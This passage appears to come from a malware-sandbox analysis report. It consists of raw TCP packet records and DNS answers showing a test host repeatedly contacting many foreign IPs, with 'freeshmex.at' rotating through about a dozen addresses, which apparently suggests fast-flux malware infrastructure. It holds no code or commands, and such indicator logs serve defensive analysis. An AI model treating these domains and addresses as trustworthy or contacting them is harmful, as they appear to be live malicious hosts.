                    Nov 24, 2022 20:13:26.553385019 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.553467989 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.553483009 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.553546906 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.553631067 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.553647041 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.553668976 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.553754091 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.553771019 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.553793907 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.553869009 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.553884983 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.553966045 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.554059982 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.554075956 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.554146051 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.554265976 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.554282904 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.554305077 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.554404020 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.554418087 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.554502964 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.554582119 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.554598093 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.588077068 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.588223934 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.588259935 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.592040062 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.592185974 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.592219114 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.592328072 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.592441082 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.592466116 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.592693090 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.592852116 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.592869043 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.593178988 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.593278885 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.593295097 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.593619108 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.593719006 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.593734026 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.594099998 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.594199896 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.594217062 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.594607115 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.594728947 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.594744921 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.595215082 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.595335960 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.595350981 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.595707893 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.595803976 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.595820904 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.596141100 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.596245050 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.596261024 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.596307039 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.596378088 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.596394062 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.596498966 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.596574068 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.596590042 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.596925020 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.597012043 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.597028971 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.597388983 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.597508907 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.597526073 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.597806931 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.597923994 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.597946882 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.598258972 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.598371983 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.598388910 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.598516941 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.598587990 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.598604918 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.598660946 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.598664999 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.598807096 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.599112988 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.599138021 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.599313021 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.599333048 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:27.585858107 CET4971680192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:27.645745993 CET8049716109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:27.645875931 CET4971680192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:27.645973921 CET4971680192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:27.646132946 CET4971680192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:27.715837002 CET8049716109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:27.920744896 CET8049716109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:27.920933008 CET4971680192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:27.930973053 CET8049716109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:27.931122065 CET4971680192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:27.931226969 CET4971680192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:27.973891020 CET4971780192.168.2.4190.140.74.43
                    Nov 24, 2022 20:13:28.004533052 CET8049716109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:28.178968906 CET8049717190.140.74.43192.168.2.4
                    Nov 24, 2022 20:13:28.179200888 CET4971780192.168.2.4190.140.74.43
                    Nov 24, 2022 20:13:28.179250956 CET4971780192.168.2.4190.140.74.43
                    Nov 24, 2022 20:13:28.179270983 CET4971780192.168.2.4190.140.74.43
                    Nov 24, 2022 20:13:28.502964020 CET8049717190.140.74.43192.168.2.4
                    Nov 24, 2022 20:13:29.175075054 CET8049717190.140.74.43192.168.2.4
                    Nov 24, 2022 20:13:29.175163031 CET8049717190.140.74.43192.168.2.4
                    Nov 24, 2022 20:13:29.175293922 CET4971780192.168.2.4190.140.74.43
                    Nov 24, 2022 20:13:29.175394058 CET4971780192.168.2.4190.140.74.43
                    Nov 24, 2022 20:13:29.220757008 CET4971880192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:29.290705919 CET8049718109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:29.290929079 CET4971880192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:29.315015078 CET4971880192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:29.315015078 CET4971880192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:29.383121967 CET8049717190.140.74.43192.168.2.4
                    Nov 24, 2022 20:13:29.395651102 CET8049718109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:29.605849028 CET8049718109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:29.605952024 CET4971880192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:29.617204905 CET8049718109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:29.619455099 CET4971880192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:29.619543076 CET4971880192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:29.652057886 CET4971980192.168.2.4211.53.230.67
                    Nov 24, 2022 20:13:29.681936979 CET8049718109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:29.909909010 CET8049719211.53.230.67192.168.2.4
                    Nov 24, 2022 20:13:29.910054922 CET4971980192.168.2.4211.53.230.67
                    Nov 24, 2022 20:13:29.910173893 CET4971980192.168.2.4211.53.230.67
                    Nov 24, 2022 20:13:29.910357952 CET4971980192.168.2.4211.53.230.67
                    Nov 24, 2022 20:13:30.169708014 CET8049719211.53.230.67192.168.2.4
                    Nov 24, 2022 20:13:30.751532078 CET8049719211.53.230.67192.168.2.4
                    Nov 24, 2022 20:13:30.751557112 CET8049719211.53.230.67192.168.2.4
                    Nov 24, 2022 20:13:30.751713037 CET4971980192.168.2.4211.53.230.67
                    Nov 24, 2022 20:13:30.752456903 CET4971980192.168.2.4211.53.230.67
                    Nov 24, 2022 20:13:30.784807920 CET4972080192.168.2.4211.171.233.129
                    Nov 24, 2022 20:13:31.010615110 CET8049719211.53.230.67192.168.2.4
                    Nov 24, 2022 20:13:31.030554056 CET8049720211.171.233.129192.168.2.4
                    Nov 24, 2022 20:13:31.030810118 CET4972080192.168.2.4211.171.233.129
                    Nov 24, 2022 20:13:31.030881882 CET4972080192.168.2.4211.171.233.129
                    Nov 24, 2022 20:13:31.030881882 CET4972080192.168.2.4211.171.233.129
                    Nov 24, 2022 20:13:31.272015095 CET8049720211.171.233.129192.168.2.4
                    Nov 24, 2022 20:13:31.995224953 CET8049720211.171.233.129192.168.2.4
                    Nov 24, 2022 20:13:31.995275974 CET8049720211.171.233.129192.168.2.4
                    Nov 24, 2022 20:13:31.995381117 CET4972080192.168.2.4211.171.233.129
                    Nov 24, 2022 20:13:31.995381117 CET4972080192.168.2.4211.171.233.129
                    Nov 24, 2022 20:13:32.024946928 CET4972180192.168.2.4211.53.230.67
                    Nov 24, 2022 20:13:32.235529900 CET8049720211.171.233.129192.168.2.4
                    Nov 24, 2022 20:13:32.275744915 CET8049721211.53.230.67192.168.2.4
                    Nov 24, 2022 20:13:32.275968075 CET4972180192.168.2.4211.53.230.67
                    Nov 24, 2022 20:13:32.276055098 CET4972180192.168.2.4211.53.230.67
                    Nov 24, 2022 20:13:32.276055098 CET4972180192.168.2.4211.53.230.67
                    Nov 24, 2022 20:13:32.527093887 CET8049721211.53.230.67192.168.2.4
                    Nov 24, 2022 20:13:33.390597105 CET8049721211.53.230.67192.168.2.4
                    Nov 24, 2022 20:13:33.390660048 CET8049721211.53.230.67192.168.2.4
                    Nov 24, 2022 20:13:33.390768051 CET4972180192.168.2.4211.53.230.67
                    Nov 24, 2022 20:13:33.390902996 CET4972180192.168.2.4211.53.230.67
                    Nov 24, 2022 20:13:33.422441006 CET4972280192.168.2.495.107.163.44
                    Nov 24, 2022 20:13:33.468997002 CET804972295.107.163.44192.168.2.4
                    Nov 24, 2022 20:13:33.470746994 CET4972280192.168.2.495.107.163.44
                    Nov 24, 2022 20:13:33.471035004 CET4972280192.168.2.495.107.163.44
                    Nov 24, 2022 20:13:33.471076965 CET4972280192.168.2.495.107.163.44
                    Nov 24, 2022 20:13:33.517525911 CET804972295.107.163.44192.168.2.4
                    Nov 24, 2022 20:13:33.639409065 CET804972295.107.163.44192.168.2.4
                    Nov 24, 2022 20:13:33.639518023 CET804972295.107.163.44192.168.2.4
                    Nov 24, 2022 20:13:33.639718056 CET4972280192.168.2.495.107.163.44
                    Nov 24, 2022 20:13:33.639718056 CET4972280192.168.2.495.107.163.44
                    Nov 24, 2022 20:13:33.686750889 CET804972295.107.163.44192.168.2.4
                    Nov 24, 2022 20:13:33.738965034 CET4972380192.168.2.4178.31.176.42
                    Nov 24, 2022 20:13:33.809001923 CET8049723178.31.176.42192.168.2.4
                    Nov 24, 2022 20:13:33.809232950 CET4972380192.168.2.4178.31.176.42
                    Nov 24, 2022 20:13:33.809376001 CET4972380192.168.2.4178.31.176.42
                    Nov 24, 2022 20:13:33.809408903 CET4972380192.168.2.4178.31.176.42
                    Nov 24, 2022 20:13:33.869211912 CET8049723178.31.176.42192.168.2.4
                    Nov 24, 2022 20:13:34.086121082 CET8049723178.31.176.42192.168.2.4
                    Nov 24, 2022 20:13:34.086180925 CET8049723178.31.176.42192.168.2.4
                    Nov 24, 2022 20:13:34.086308002 CET4972380192.168.2.4178.31.176.42
                    Nov 24, 2022 20:13:34.086308002 CET4972380192.168.2.4178.31.176.42
                    Nov 24, 2022 20:13:34.120419025 CET4972380192.168.2.4178.31.176.42
                    Nov 24, 2022 20:13:34.165294886 CET4972180192.168.2.4211.53.230.67
                    Nov 24, 2022 20:13:34.179063082 CET8049723178.31.176.42192.168.2.4
                    Nov 24, 2022 20:13:34.294203043 CET4972480192.168.2.495.107.163.44
                    Nov 24, 2022 20:13:34.341631889 CET804972495.107.163.44192.168.2.4
                    Nov 24, 2022 20:13:34.343013048 CET4972480192.168.2.495.107.163.44
                    Nov 24, 2022 20:13:34.343410969 CET4972480192.168.2.495.107.163.44
                    Nov 24, 2022 20:13:34.343518972 CET4972480192.168.2.495.107.163.44
                    Nov 24, 2022 20:13:34.390499115 CET804972495.107.163.44192.168.2.4
                    Nov 24, 2022 20:13:34.416379929 CET8049721211.53.230.67192.168.2.4
                    Nov 24, 2022 20:13:34.497175932 CET804972495.107.163.44192.168.2.4
                    Nov 24, 2022 20:13:34.497406960 CET804972495.107.163.44192.168.2.4
                    Nov 24, 2022 20:13:34.497596025 CET4972480192.168.2.495.107.163.44
                    Nov 24, 2022 20:13:34.518393040 CET4972480192.168.2.495.107.163.44
                    Nov 24, 2022 20:13:34.566004992 CET804972495.107.163.44192.168.2.4
                    Nov 24, 2022 20:13:34.671663046 CET4972580192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:34.739881039 CET8049725109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:34.740080118 CET4972580192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:34.740168095 CET4972580192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:34.740305901 CET4972580192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:34.808068037 CET8049725109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:34.954396009 CET8049725109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:34.955235958 CET4972580192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:34.972809076 CET8049725109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:34.976985931 CET4972580192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:35.335396051 CET4972580192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:35.393172979 CET8049725109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:35.444663048 CET4972680192.168.2.4190.140.74.43
                    Nov 24, 2022 20:13:35.645400047 CET8049726190.140.74.43192.168.2.4
                    Nov 24, 2022 20:13:35.645669937 CET4972680192.168.2.4190.140.74.43
                    Nov 24, 2022 20:13:35.645670891 CET4972680192.168.2.4190.140.74.43
                    Nov 24, 2022 20:13:35.645742893 CET4972680192.168.2.4190.140.74.43
                    Nov 24, 2022 20:13:35.847518921 CET8049726190.140.74.43192.168.2.4
                    Nov 24, 2022 20:13:36.539628983 CET8049726190.140.74.43192.168.2.4
                    Nov 24, 2022 20:13:36.539685965 CET8049726190.140.74.43192.168.2.4
                    Nov 24, 2022 20:13:36.539808035 CET4972680192.168.2.4190.140.74.43
                    Nov 24, 2022 20:13:37.329932928 CET4972680192.168.2.4190.140.74.43
                    Nov 24, 2022 20:13:37.531261921 CET8049726190.140.74.43192.168.2.4
                    Nov 24, 2022 20:13:37.534754038 CET4972780192.168.2.4178.31.176.42
                    Nov 24, 2022 20:13:37.609807014 CET8049727178.31.176.42192.168.2.4
                    Nov 24, 2022 20:13:37.609931946 CET4972780192.168.2.4178.31.176.42
                    Nov 24, 2022 20:13:37.610042095 CET4972780192.168.2.4178.31.176.42
                    Nov 24, 2022 20:13:37.610502005 CET4972780192.168.2.4178.31.176.42
                    Nov 24, 2022 20:13:37.669027090 CET8049727178.31.176.42192.168.2.4
                    Nov 24, 2022 20:13:37.977116108 CET8049727178.31.176.42192.168.2.4
                    Nov 24, 2022 20:13:37.977166891 CET8049727178.31.176.42192.168.2.4
                    Nov 24, 2022 20:13:37.977202892 CET4972780192.168.2.4178.31.176.42
                    Nov 24, 2022 20:13:37.977261066 CET4972780192.168.2.4178.31.176.42
                    Nov 24, 2022 20:13:37.977284908 CET4972780192.168.2.4178.31.176.42
                    Nov 24, 2022 20:13:38.022789001 CET4972880192.168.2.4211.171.233.129
                    Nov 24, 2022 20:13:38.039057016 CET8049727178.31.176.42192.168.2.4
                    Nov 24, 2022 20:13:38.274179935 CET8049728211.171.233.129192.168.2.4
                    Nov 24, 2022 20:13:38.274593115 CET4972880192.168.2.4211.171.233.129
                    Nov 24, 2022 20:13:38.277184010 CET4972880192.168.2.4211.171.233.129
                    Nov 24, 2022 20:13:38.277184010 CET4972880192.168.2.4211.171.233.129
                    Nov 24, 2022 20:13:38.529455900 CET8049728211.171.233.129192.168.2.4
                    Nov 24, 2022 20:13:39.528865099 CET8049728211.171.233.129192.168.2.4
                    Nov 24, 2022 20:13:39.528929949 CET8049728211.171.233.129192.168.2.4
                    Nov 24, 2022 20:13:39.529092073 CET4972880192.168.2.4211.171.233.129
                    Nov 24, 2022 20:13:39.529201031 CET4972880192.168.2.4211.171.233.129
                    Nov 24, 2022 20:13:39.569520950 CET4972980192.168.2.495.107.163.44
                    Nov 24, 2022 20:13:39.616786957 CET804972995.107.163.44192.168.2.4
                    Nov 24, 2022 20:13:39.616883993 CET4972980192.168.2.495.107.163.44
                    Nov 24, 2022 20:13:39.616995096 CET4972980192.168.2.495.107.163.44
                    Nov 24, 2022 20:13:39.617022991 CET4972980192.168.2.495.107.163.44
                    Nov 24, 2022 20:13:39.664114952 CET804972995.107.163.44192.168.2.4
                    Nov 24, 2022 20:13:39.780591011 CET8049728211.171.233.129192.168.2.4
                    Nov 24, 2022 20:13:39.801582098 CET804972995.107.163.44192.168.2.4
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                    Nov 24, 2022 20:13:23.853676081 CET8.8.8.8192.168.2.40xd330No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:23.853676081 CET8.8.8.8192.168.2.40xd330No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:23.853676081 CET8.8.8.8192.168.2.40xd330No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:23.853676081 CET8.8.8.8192.168.2.40xd330No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:26.163016081 CET8.8.8.8192.168.2.40x2242No error (0)thepokeway.nl5.135.247.111A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.219906092 CET8.8.8.8192.168.2.40xf846No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
